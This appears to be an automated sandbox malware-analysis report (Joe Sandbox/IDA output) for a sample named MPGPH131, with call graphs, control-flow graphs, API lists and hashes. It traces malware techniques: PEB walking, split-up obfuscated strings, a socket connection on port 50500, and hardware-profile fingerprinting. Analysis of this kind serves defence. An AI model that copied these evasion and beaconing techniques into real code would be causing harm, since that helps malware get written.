23584->23583 23596 3ddd11 RtlAllocateHeap RtlAllocateHeap ___std_exception_destroy ___std_exception_copy 23584->23596 23586 301fe3 23586->23577 23587->23568 23588->23577 23595 3f44ed __dosmaperr std::_Facet_Register 23590->23595 23591 3f452b 23597 3ea8ff RtlAllocateHeap __dosmaperr 23591->23597 23593 3f4516 RtlAllocateHeap 23594 3f4529 23593->23594 23593->23595 23594->23582 23595->23591 23595->23593 23596->23586 23597->23594 23711 8b1000 23713 8b1044 GetPEB 23711->23713 23715 8b1077 CreateFileA 23713->23715 23716 8b122d 23715->23716 23717 4e90879 GetCurrentHwProfileW 23718 4e908b5 23717->23718 23728 3ea828 23729 3ea83b ___std_exception_copy 23728->23729 23734 3ea60a 23729->23734 23731 3ea850 23742 3e1b9c RtlAllocateHeap ___std_exception_copy 23731->23742 23733 3ea85d 23735 3ea618 23734->23735 23740 3ea640 23734->23740 23736 3ea647 23735->23736 23737 3ea625 23735->23737 23735->23740 23743 3ea563 23736->23743 23747 3e1de3 RtlAllocateHeap ___std_exception_copy __Getctype 23737->23747 23740->23731 23741 3ea67f 23741->23731 23742->23733 23744 3ea56f std::locale::_Setgloballocale 23743->23744 23748 3ea5be 23744->23748 23746 3ea58a 23746->23741 23747->23740 23755 3f5d03 23748->23755 23754 3ea600 23754->23746 23772 3f5cc5 23755->23772 23757 3f5d14 23758 3ea5d6 23757->23758 23780 3f44ed RtlAllocateHeap RtlAllocateHeap __dosmaperr std::_Facet_Register 23757->23780 23762 3ea681 23758->23762 23760 3f5d6d 23781 3f4473 RtlAllocateHeap __dosmaperr 23760->23781 23765 3ea693 23762->23765 23766 3ea5f4 23762->23766 23763 3ea6a1 23782 3e1de3 RtlAllocateHeap ___std_exception_copy __Getctype 23763->23782 23765->23763 23765->23766 23769 3ea6d7 std::_Locinfo::_Locinfo_ctor 23765->23769 23771 3f5dae SetFilePointerEx WriteFile RtlAllocateHeap RtlAllocateHeap 23766->23771 23767 3e2c91 4 API calls 23767->23769 23768 3f3642 RtlAllocateHeap 23768->23769 23769->23766 23769->23767 23769->23768 23770 3f2a4b 4 API calls 23769->23770 23770->23769 23771->23754 23775 3f5cd1 23772->23775 23773 3f5cff 23773->23757 23774 3f5cfb 23774->23757 23775->23773 23775->23774 23776 3f3642 RtlAllocateHeap 23775->23776 23777 3f5cec 23776->23777 23778 3fe404 RtlAllocateHeap 23777->23778 23779 3f5cf2 23778->23779 23779->23757 23780->23760 23781->23758 23782->23766 23783 3e62a8 23784 3e62bb ___std_exception_copy 23783->23784 23789 3e6183 23784->23789 23786 3e62c7 23796 3e1b9c RtlAllocateHeap ___std_exception_copy 23786->23796 23788 3e62d3 23790 3e618f std::locale::_Setgloballocale 23789->23790 23791 3e6199 23790->23791 23793 3e61bc 23790->23793 23811 3e1de3 RtlAllocateHeap ___std_exception_copy __Getctype 23791->23811 23795 3e61b4 23793->23795 23797 3e621a 23793->23797 23795->23786 23796->23788 23798 3e624a 23797->23798 23799 3e6227 23797->23799 23801 3e2c91 4 API calls 23798->23801 23809 3e6242 23798->23809 23823 3e1de3 RtlAllocateHeap ___std_exception_copy __Getctype 23799->23823 23802 3e6262 23801->23802 23812 3f44ad 23802->23812 23805 3f3642 RtlAllocateHeap 23806 3e6276 23805->23806 23816 3f20ff 23806->23816 23809->23795 23811->23795 23813 3e626a 23812->23813 23814 3f44c4 23812->23814 23813->23805 23814->23813 23825 3f4473 RtlAllocateHeap __dosmaperr 23814->23825 23817 3f2128 23816->23817 23820 3e627d 23816->23820 23818 3f2177 23817->23818 23821 3f214f 23817->23821 23830 3e1de3 RtlAllocateHeap ___std_exception_copy __Getctype 23818->23830 23820->23809 23824 3f4473 RtlAllocateHeap __dosmaperr 23820->23824 23826 3f206e 23821->23826 23823->23809 23824->23809 23825->23813 23827 3f207a std::locale::_Setgloballocale 23826->23827 23829 3f20b9 23827->23829 23831 3f21d2 23827->23831 23829->23820 23830->23820 23832 3f7d9e RtlAllocateHeap 23831->23832 23834 3f21e2 23832->23834 23836 3f7d9e RtlAllocateHeap 23834->23836 23841 3f21e8 23834->23841 23842 3f221a 23834->23842 23835 3f7d9e RtlAllocateHeap 23837 3f2226 FindCloseChangeNotification 23835->23837 23839 3f2211 23836->23839 23837->23841 23838 3f2240 23838->23829 23840 3f7d9e RtlAllocateHeap 23839->23840 23840->23842 23843 3f7d0d RtlAllocateHeap __dosmaperr 23841->23843 23842->23835 23842->23841 23843->23838 23908 37c6a0 RtlAllocateHeap 23847 3e2a20 23850 3e295e 23847->23850 23849 3e2a32 23853 3e296a std::locale::_Setgloballocale 23850->23853 23851 3e2971 23868 3ea8ff RtlAllocateHeap __dosmaperr 23851->23868 23853->23851 23855 3e2991 23853->23855 23854 3e2976 23869 3e1e60 RtlAllocateHeap ___std_exception_copy 23854->23869 23857 3e2996 23855->23857 23858 3e29a3 23855->23858 23870 3ea8ff RtlAllocateHeap __dosmaperr 23857->23870 23864 3f3d48 23858->23864 23861 3e29ac 23863 3e2981 23861->23863 23871 3ea8ff RtlAllocateHeap __dosmaperr 23861->23871 23863->23849 23865 3f3d54 std::_Lockit::_Lockit std::locale::_Setgloballocale 23864->23865 23872 3f3dec 23865->23872 23867 3f3d6f 23867->23861 23868->23854 23869->23863 23870->23863 23871->23863 23873 3f3e0f 23872->23873 23877 3f3e55 23873->23877 23878 3f3ab3 23873->23878 23875 3f3e70 23882 3f4473 RtlAllocateHeap __dosmaperr 23875->23882 23877->23867 23881 3f3ac0 __dosmaperr std::_Facet_Register 23878->23881 23879 3f3aeb RtlAllocateHeap 23880 3f3afe __dosmaperr 23879->23880 23879->23881 23880->23875 23881->23879 23881->23880 23882->23877 23909 314a90 GetSystemTimePreciseAsFileTime __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __Xtime_get_ticks 23914 308b00 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 23915 31a100 7 API calls 3 library calls 23598 3e67f6 23599 3e6809 ___std_exception_copy 23598->23599 23604 3e654d 23599->23604 23601 3e681e 23611 3e1b9c RtlAllocateHeap ___std_exception_copy 23601->23611 23603 3e682b 23607 3e6559 std::locale::_Setgloballocale 23604->23607 23605 3e655f 23621 3e1de3 RtlAllocateHeap ___std_exception_copy __Getctype 23605->23621 23607->23605 23608 3e65a2 23607->23608 23612 3e66d0 23608->23612 23610 3e657a 23610->23601 23611->23603 23613 3e66f6 23612->23613 23614 3e66e3 23612->23614 23622 3e65f7 23613->23622 23614->23610 23616 3e67a7 23616->23610 23617 3e6719 23617->23616 23626 3e2c91 23617->23626 23621->23610 23623 3e6608 23622->23623 23624 3e6660 23622->23624 23623->23624 23635 3eb7fd SetFilePointerEx RtlAllocateHeap ___std_exception_copy 23623->23635 23624->23617 23627 3e2caa 23626->23627 23628 3e2cd1 23626->23628 23627->23628 23636 3f3642 23627->23636 23632 3eb83d 23628->23632 23630 3e2cc6 23643 3f2a4b 23630->23643 23687 3eb71c 23632->23687 23634 3eb856 23634->23616 23635->23624 23637 3f364e 23636->23637 23638 3f3663 23636->23638 23650 3ea8ff RtlAllocateHeap __dosmaperr 23637->23650 23638->23630 23640 3f3653 23651 3e1e60 RtlAllocateHeap ___std_exception_copy 23640->23651 23642 3f365e 23642->23630 23644 3f2a57 std::locale::_Setgloballocale 23643->23644 23645 3f2a98 23644->23645 23647 3f2ade 23644->23647 23648 3f2a5f 23644->23648 23666 3e1de3 RtlAllocateHeap ___std_exception_copy __Getctype 23645->23666 23647->23648 23652 3f2b5c 23647->23652 23648->23628 23650->23640 23651->23642 23653 3f2b84 23652->23653 23665 3f2ba7 23652->23665 23654 3f2b88 23653->23654 23656 3f2be3 23653->23656 23672 3e1de3 RtlAllocateHeap ___std_exception_copy __Getctype 23654->23672 23657 3f2c01 23656->23657 23658 3eb83d 2 API calls 23656->23658 23667 3f26a1 23657->23667 23658->23657 23661 3f2c19 23661->23665 23673 3f2272 RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_ctor _ValidateLocalCookies 23661->23673 23662 3f2c60 23663 3f2cc9 WriteFile 23662->23663 23662->23665 23663->23665 23665->23648 23666->23648 23674 3fe404 23667->23674 23669 3f26b3 23671 3f26e1 23669->23671 23683 3e73d0 RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_ctor ___std_exception_copy 23669->23683 23671->23661 23671->23662 23672->23665 23673->23665 23675 3fe41e 23674->23675 23676 3fe411 23674->23676 23678 3fe42a 23675->23678 23685 3ea8ff RtlAllocateHeap __dosmaperr 23675->23685 23684 3ea8ff RtlAllocateHeap __dosmaperr 23676->23684 23678->23669 23680 3fe416 23680->23669 23681 3fe44b 23686 3e1e60 RtlAllocateHeap ___std_exception_copy 23681->23686 23683->23671 23684->23680 23685->23681 23686->23680 23692 3f7d9e 23687->23692 23689 3eb72e 23690 3eb74a SetFilePointerEx 23689->23690 23691 3eb736 23689->23691 23690->23691 23691->23634 23693 3f7dab 23692->23693 23694 3f7dc0 23692->23694 23705 3ea8ec RtlAllocateHeap __dosmaperr 23693->23705 23699 3f7de5 23694->23699 23707 3ea8ec RtlAllocateHeap __dosmaperr 23694->23707 23696 3f7db0 23706 3ea8ff RtlAllocateHeap __dosmaperr 23696->23706 23699->23689 23700 3f7df0 23708 3ea8ff RtlAllocateHeap __dosmaperr 23700->23708 23702 3f7db8 23702->23689 23703 3f7df8 23709 3e1e60 RtlAllocateHeap ___std_exception_copy 23703->23709 23705->23696 23706->23702 23707->23700 23708->23703 23709->23702 23720 31db60 WSAStartup 23721 31db98 23720->23721 23724 31dc56 23720->23724 23722 31dc24 socket 23721->23722 23721->23724 23723 31dc3a connect 23722->23723 23722->23724 23723->23724 23725 31dc4c closesocket 23723->23725 23725->23722 23725->23724 23901 31e460 6 API calls 23846 4e90634 GetCurrentHwProfileW 23917 302540 RtlAllocateHeap RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_ctor

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 8b1044-8b1074 GetPEB 1 8b1077-8b109a 0->1 2 8b109d-8b10a0 1->2 3 8b11ee-8b122b CreateFileA 2->3 4 8b10a6-8b10bc 2->4 21 8b122d-8b1230 3->21 22 8b1265-8b1269 3->22 5 8b10be-8b10c5 4->5 6 8b1110-8b1116 4->6 5->6 10 8b10c7-8b10ce 5->10 8 8b1129-8b112f 6->8 9 8b1118-8b111f 6->9 12 8b1148-8b114e 8->12 13 8b1131-8b1138 8->13 9->8 11 8b1121-8b1124 9->11 10->6 14 8b10d0-8b10d7 10->14 16 8b11bb-8b11c0 11->16 18 8b1150-8b1157 12->18 19 8b1167-8b116f 12->19 13->12 17 8b113a-8b1141 13->17 14->6 20 8b10d9-8b10dd 14->20 24 8b11c2-8b11c5 16->24 25 8b11e0-8b11e9 16->25 17->12 23 8b1143-8b1146 17->23 18->19 26 8b1159-8b1160 18->26 27 8b1188-8b118e 19->27 28 8b1171-8b1178 19->28 20->6 29 8b10df-8b10e3 20->29 32 8b1232-8b1238 21->32 23->16 24->25 33 8b11c7-8b11ca 24->33 25->2 26->19 34 8b1162-8b1165 26->34 30 8b1190-8b1197 27->30 31 8b11a7-8b11ad 27->31 28->27 35 8b117a-8b1181 28->35 29->16 36 8b10e9-8b110b 29->36 30->31 37 8b1199-8b11a0 30->37 31->16 38 8b11af-8b11b6 31->38 39 8b123a-8b1242 32->39 40 8b1246-8b1251 32->40 33->25 41 8b11cc-8b11cf 33->41 34->16 35->27 42 8b1183-8b1186 35->42 36->1 37->31 43 8b11a2-8b11a5 37->43 38->16 44 8b11b8 38->44 39->32 45 8b1244 39->45 48 8b1255-8b1261 40->48 41->25 46 8b11d1-8b11d4 41->46 42->16 43->16 44->16 45->48 46->25 49 8b11d6-8b11d9 46->49 48->22 49->25 50 8b11db-8b11de 49->50 50->3 50->25
                                    APIs
                                    • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 008B1223
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$WwKLWFk.exe$athA$catA$dleA$el32$lstr$odul
                                    • API String ID: 823142352-1035807574
                                    • Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                    • Instruction ID: c96851f0987c8afbc2e98fb2e1eb046562e801de2c9ffb537dba27b6c6383483
                                    • Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                    • Instruction Fuzzy Hash: 25612975D01219DBCF24CF98C8A8AEEF7B4FB44315FA4926AD605AB301C3309A81CB95

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 52 31db60-31db92 WSAStartup 53 31dc66-31dc6f 52->53 54 31db98-31dbc2 call 307d20 * 2 52->54 59 31dbc4-31dbc8 54->59 60 31dbce-31dc14 54->60 59->53 59->60 62 31dc60-31dc65 60->62 63 31dc16-31dc1c 60->63 62->53 64 31dc74-31dc7e 63->64 65 31dc1e 63->65 64->62 70 31dc80-31dc88 64->70 67 31dc24-31dc38 socket 65->67 67->62 69 31dc3a-31dc4a connect 67->69 71 31dc70 69->71 72 31dc4c-31dc54 closesocket 69->72 71->64 72->67 73 31dc56-31dc5a 72->73 73->62
                                    APIs
                                    • WSAStartup.WS2_32 ref: 0031DB8A
                                    • socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 0031DC2E
                                    • connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 0031DC42
                                    • closesocket.WS2_32(00000000), ref: 0031DC4D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Startupclosesocketconnectsocket
                                    • String ID: 50500
                                    • API String ID: 3098855095-2230786414
                                    • Opcode ID: b99e192898a687ce11528e54ec941f75a434ec1c958532d2f419b1cb274467b9
                                    • Instruction ID: 4167ef0984ae0e00558206a3d3dbeb497006ade010d0d806257f688a6b31858a
                                    • Opcode Fuzzy Hash: b99e192898a687ce11528e54ec941f75a434ec1c958532d2f419b1cb274467b9
                                    • Instruction Fuzzy Hash: 8E31F5725053106BC7218B288C85B6FB7E5FFCA734F111F1DF8A8A32D0D370A8448692

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 74 4e90687-4e90695 75 4e906e8-4e90874 74->75 76 4e90697-4e906e6 74->76 101 4e9088d-4e908a0 GetCurrentHwProfileW 75->101 76->75 102 4e908b5-4e90982 call 4e90984 101->102 113 4e90989-4e90b45 102->113 114 4e90984 102->114 114->113
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5ee789b2ec167919f1ce34b461fb767f726fc8221a2fcfcd267a8daa7b0774ef
                                    • Instruction ID: 89878d53c0fc5e7e2803b0a7e200ebd9064ba91069b5fa2abe690dbb0d07913a
                                    • Opcode Fuzzy Hash: 5ee789b2ec167919f1ce34b461fb767f726fc8221a2fcfcd267a8daa7b0774ef
                                    • Instruction Fuzzy Hash: 055115EB30D210BDFA5286411B50AFA27EDE7D67307B0A42AF407D56C2F3A42E8575B1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 138 4e9065c-4e90669 139 4e9066b 138->139 140 4e9064a-4e90657 138->140 141 4e9066d-4e90874 139->141 140->141 171 4e9088d-4e908a0 GetCurrentHwProfileW 141->171 172 4e908b5-4e90982 call 4e90984 171->172 183 4e90989-4e90b45 172->183 184 4e90984 172->184 184->183
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6691a2275afe0b8b1b46ebbf7ac8a8fef5ac75679652ee2bc0343ff7e50ed6fd
                                    • Instruction ID: 06fe5bf3c1df11daea689dfa85fc57e54e394ade2bddb2f79e9e0d2fb6c809d3
                                    • Opcode Fuzzy Hash: 6691a2275afe0b8b1b46ebbf7ac8a8fef5ac75679652ee2bc0343ff7e50ed6fd
                                    • Instruction Fuzzy Hash: 6951E3EB30C210FDFA5296451B50AF626EDE7C67307B0A42AF807D56C2F3942E893471

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 208 4e90640-4e90874 240 4e9088d-4e908a0 GetCurrentHwProfileW 208->240 241 4e908b5-4e90982 call 4e90984 240->241 252 4e90989-4e90b45 241->252 253 4e90984 241->253 253->252
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: b60567bbe3f2dd6d85c5b9db40a36f6c39496e1f07fa19599529167ae3240d81
                                    • Instruction ID: 7be84b3c96bd696fcaa127f4851b646d5661531f98304d75e69cd1a68f95edfe
                                    • Opcode Fuzzy Hash: b60567bbe3f2dd6d85c5b9db40a36f6c39496e1f07fa19599529167ae3240d81
                                    • Instruction Fuzzy Hash: 7B51D3EB30C124FDFA5296451B50AFA66EDE7C67307B0A42AF807D56C2F3942E893471

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 277 4e90634-4e90874 308 4e9088d-4e908a0 GetCurrentHwProfileW 277->308 309 4e908b5-4e90982 call 4e90984 308->309 320 4e90989-4e90b45 309->320 321 4e90984 309->321 321->320
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 8649347fd4fde5dbb01c3b10c65f7b181228a5ec7c843379f1cf861adb42353b
                                    • Instruction ID: e94ade1979274766142dbd138357969fa3bbb64e1f20832145a3f5dbc9ad219f
                                    • Opcode Fuzzy Hash: 8649347fd4fde5dbb01c3b10c65f7b181228a5ec7c843379f1cf861adb42353b
                                    • Instruction Fuzzy Hash: 0751C1EB30C120FDF95286451B50AFA16EDE7D67307B0A42AB807D56C2F3942E893471

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 345 4e9067b-4e90874 373 4e9088d-4e908a0 GetCurrentHwProfileW 345->373 374 4e908b5-4e90982 call 4e90984 373->374 385 4e90989-4e90b45 374->385 386 4e90984 374->386 386->385
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a643ab42f3a47e964d5a043c54092beae38aafde1e88c6919dd20026b029b6f8
                                    • Instruction ID: 51619bff1338e7f866a7a0855c3f5a43a63526ee39fe0fd6da39830f81b92d27
                                    • Opcode Fuzzy Hash: a643ab42f3a47e964d5a043c54092beae38aafde1e88c6919dd20026b029b6f8
                                    • Instruction Fuzzy Hash: 9251D1EB30C124FDFD5282461B50AF616EDE7C67307B0A42AB807D56C2F3942E8974B2

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 410 4e90731-4e90732 411 4e906d1-4e9072c 410->411 412 4e90734-4e90736 410->412 416 4e9073c-4e90874 411->416 412->411 414 4e90738-4e9073a 412->414 414->416 436 4e9088d-4e908a0 GetCurrentHwProfileW 416->436 437 4e908b5-4e90982 call 4e90984 436->437 448 4e90989-4e90b45 437->448 449 4e90984 437->449 449->448
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 588ab3d8b3c91a234c80808be270600c47943aa9c826618762565cad9ed46d52
                                    • Instruction ID: 7783f09c14c47e51fbefe7598e5bda441e5f2923321289896f2400c145b279b3
                                    • Opcode Fuzzy Hash: 588ab3d8b3c91a234c80808be270600c47943aa9c826618762565cad9ed46d52
                                    • Instruction Fuzzy Hash: AD51B1EB30D114BDFA5286452B50AFA56EDE7C67307B0A426F807D5682F3D42E8934B1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 473 4e906c3-4e90874 496 4e9088d-4e908a0 GetCurrentHwProfileW 473->496 497 4e908b5-4e90982 call 4e90984 496->497 508 4e90989-4e90b45 497->508 509 4e90984 497->509 509->508
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 8c623bbcafb6fba3dafc9dbb2aa67837de48b976123100002bb957dfa34ab7a4
                                    • Instruction ID: aa9ba1a81c60f7b085790ff33a2d1c763abd59d54287977369aaee177d5d7af0
                                    • Opcode Fuzzy Hash: 8c623bbcafb6fba3dafc9dbb2aa67837de48b976123100002bb957dfa34ab7a4
                                    • Instruction Fuzzy Hash: 6A5103EB70C124BDFA5286451B50AFA16EDE7C67307B0A02AF807D56C2F3D42E8934B1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 533 4e906f5-4e906f9 534 4e906fb-4e906fe 533->534 535 4e90700-4e90874 533->535 534->535 555 4e9088d-4e908a0 GetCurrentHwProfileW 535->555 556 4e908b5-4e90982 call 4e90984 555->556 567 4e90989-4e90b45 556->567 568 4e90984 556->568 568->567
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: be6e10470f48d89a1d7e39412e0440c58a7bb20530a32cc5d60120d6cbe81d47
                                    • Instruction ID: 703db38718311250d35739564ee01adb6d2965e37308a12817c47f1448f50902
                                    • Opcode Fuzzy Hash: be6e10470f48d89a1d7e39412e0440c58a7bb20530a32cc5d60120d6cbe81d47
                                    • Instruction Fuzzy Hash: 0A51D1EB30C110ADFA5696452B50AFA57EDE7C67307B0A02AF807D56C2F3D42E8974B1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 592 4e90758-4e90759 593 4e90719-4e90750 592->593 594 4e9075b-4e9075d 592->594 595 4e9075e-4e90874 593->595 594->595 614 4e9088d-4e908a0 GetCurrentHwProfileW 595->614 615 4e908b5-4e90982 call 4e90984 614->615 626 4e90989-4e90b45 615->626 627 4e90984 615->627 627->626
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 43f7f8bc76490adb782554ed250e8d821bc0198e49f868b1f9ed15f65e45cea0
                                    • Instruction ID: ca94780ad74effdbe6523f4ffcb1661224b00799652d6ef31353e1059fbfda48
                                    • Opcode Fuzzy Hash: 43f7f8bc76490adb782554ed250e8d821bc0198e49f868b1f9ed15f65e45cea0
                                    • Instruction Fuzzy Hash: CC51D0EB70C114BDFE5296462B50AFA16EDE7C67307B0A426F807D56C2F3942E8934B1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 651 4e90715-4e90874 672 4e9088d-4e908a0 GetCurrentHwProfileW 651->672 673 4e908b5-4e90982 call 4e90984 672->673 684 4e90989-4e90b45 673->684 685 4e90984 673->685 685->684
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 4f5e464b853c251c0727194962dc3842f39a68753e9d7d9b1ecad3ced810fe01
